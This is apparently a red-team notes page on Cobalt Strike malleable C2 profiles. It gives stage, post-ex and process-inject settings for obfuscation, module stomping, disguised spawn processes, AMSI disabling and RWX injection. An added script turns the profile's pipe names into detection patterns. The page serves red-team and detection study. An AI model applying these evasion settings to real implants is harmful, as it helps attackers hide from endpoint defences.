# Malleable Profiles

<https://github.com/FortyNorthSecurity/C2concealer>

<https://github.com/threatexpress/random_c2_profile>

### Options:

```bash
# size of the assembly/PowerShell scripts
set tasks_max_size "";
```

### Beacons:

```
stage {
	set compile_time "DATE OF COMPILATION";
	set image_size_x64 "522090";
	set image_size_x86 "522090";
	set cleanup "true";
	set obfuscate "true";
	set name "dataparse.dll";
	set module_x86 "wuaueng.dll";
	set module_x64 "mssrch.dll";
	set stomppe "true";
	transform-x86 {
		strrep "ReflectiveLoader" "RunHelloWorld";
	}
	transform-x64 {
		strrep "ReflectiveLoader" "PrintMenu";
	}
}
```

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FYhWuoGnuZzs191NHOI1F%2Fimage.png?alt=media&#x26;token=4d11957b-6001-4a48-8c43-adb639237f4b" alt=""><figcaption></figcaption></figure>

### Post-Ex:

```
##         = random numbers
msagent_## = standard communications 
status_##  = staging over SMB
```

```
post-ex {
      # control the temporary process we spawn to
      set spawnto_x86 "%windir%\\syswow64\\dllhost.exe -k netsvcs";
      set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";

      # change the permissions and content of our post-ex DLLs 
      set obfuscate "true";

      # change our post-ex output named pipe names...
      set pipename "evil_####, stuff\\not_##_ev#l";
      set pipename_stager "update_##";

      # pass key function pointers from Beacon to its child jobs 
      set smartinject "true";

      # disable AMSI in powerpick, execute-assembly, and psinject 
      set amsi_disable "true";
}

```
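For defenders, the pipe-name templates above translate directly into hunting patterns for pipe-creation telemetry. The following is an added example, not part of the original notes: it assumes each `#` is replaced by one random hex digit, the events are constructed, and `TEMPLATES`, `SAMPLE_EVENTS` and the function names are illustrative.

```python
import re

# Pipe-name templates from this page: the legend's two names and the
# pipename / pipename_stager values in the post-ex block.
TEMPLATES = {
    "msagent_##": "standard communications (legend)",
    "status_##": "staging over SMB (legend)",
    "evil_####, stuff\\not_##_ev#l": "post-ex pipename",
    "update_##": "pipename_stager",
}

def template_to_regex(template):
    """Turn one pipe-name template into an anchored regex.

    Assumption: each '#' is one random hex digit (covers plain digits too).
    """
    parts = [re.escape(chunk) for chunk in template.split("#")]
    return re.compile(r"^\\?" + "[0-9a-f]".join(parts) + "$", re.IGNORECASE)

def build_rules(templates):
    """Expand comma-separated template lists into (regex, label) rules."""
    return [(template_to_regex(name.strip()), label)
            for value, label in templates.items()
            for name in value.split(",")]

def match_pipe_events(events, rules):
    """Return (pipe name, image, label) for each event that matches a rule."""
    hits = []
    for event in events:
        for regex, label in rules:
            if regex.match(event["PipeName"]):
                hits.append((event["PipeName"], event["Image"], label))
                break
    return hits

# Constructed pipe-creation events, using Sysmon Event ID 17 field names.
SAMPLE_EVENTS = [
    {"PipeName": "\\msagent_3f", "Image": "C:\\Windows\\System32\\rundll32.exe"},
    {"PipeName": "\\status_7a", "Image": "C:\\Windows\\System32\\rundll32.exe"},
    {"PipeName": "\\evil_09af", "Image": "C:\\Windows\\SysWOW64\\dllhost.exe"},
    {"PipeName": "\\stuff\\not_4c_ev1l", "Image": "C:\\Windows\\System32\\mstsc.exe"},
    {"PipeName": "\\lsass", "Image": "C:\\Windows\\System32\\lsass.exe"},
    {"PipeName": "\\msagent_service", "Image": "C:\\Program Files\\Vendor\\agent.exe"},
    {"PipeName": "\\update_zz", "Image": "C:\\Program Files\\Vendor\\updater.exe"},
]

if __name__ == "__main__":
    for hit in match_pipe_events(SAMPLE_EVENTS, build_rules(TEMPLATES)):
        print(*hit, sep="  |  ")
```

Anchoring the patterns on the full pipe name keeps look-alike names such as `msagent_service` out of the results.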

### Process-Inject:

```
process-inject {
    # set how memory is allocated in a remote process:
    set allocator "VirtualAllocEx";
    
    # shape memory characteristics and content:
    set min_alloc "16384";
    set startrwx "true";
    set userwx "false";
    
    transform-x86 {
        prepend "\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90";
    }
    
    # determine how to execute the injected code
    execute {
        CreateThread "ntdll.dll!RtlUserThreadStart";
        SetThreadContext;
        RtlCreateUserThread;
    }
}
```
